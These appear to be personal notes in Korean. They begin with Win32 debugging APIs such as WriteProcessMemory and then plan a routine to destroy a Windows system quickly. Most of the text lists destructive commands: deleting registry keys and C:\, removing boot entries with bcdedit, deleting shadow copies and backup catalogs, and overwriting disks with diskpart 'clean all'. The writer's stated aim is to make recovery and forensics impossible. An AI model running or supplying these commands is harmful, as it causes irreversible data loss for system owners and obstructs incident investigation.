Win32 API

memoryapi.h 라이브러리에 존재한다. -> 원래의 목적은 다른 프로세스(debuggee) 내부를 살펴보기 위한 디버거 구현시 사용

debugger가 debuggee에 작성하기 위해서는 WriteProcessMemory() 를 활용하는 등..
프로세스 간 R,W가 되기 위해서는 디버거-디버기 관계가 중요

nop : not operation ->
EULA? -> 데이터 수집 및 사용

윈도우 시스템 파괴
접근 권한이 있는 상태에서 시스템을 재빨리 파괴하는 ex) reg delete, RD C:\ /S /Q

패치 방법도 생각해보기

-> 가상머신이 없다.. 윈도우를 가져와야 하는데 일단 서치만 해보자

bcdedit /enum firmware bcdedit /delete {identifier}

먼저 생각난 건 디스크 없애기.. 포렌식이 어렵도록 하는 게 괴랄하다고 생각했다 디스크는 그냥 삭제하는 것이 아닌 덮어쓰면 복구가 불가하다고 한다. 그래서 마지막에 disk를 고르면 clean all을 해주기로 했다.

vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete

이건 복구가 불가능하도록 악성코드에서 많이들 실행하는 명령문이다.

list disk 
select disk 1 
clean all 

집 가서 되나 확인해보기

windows 21105590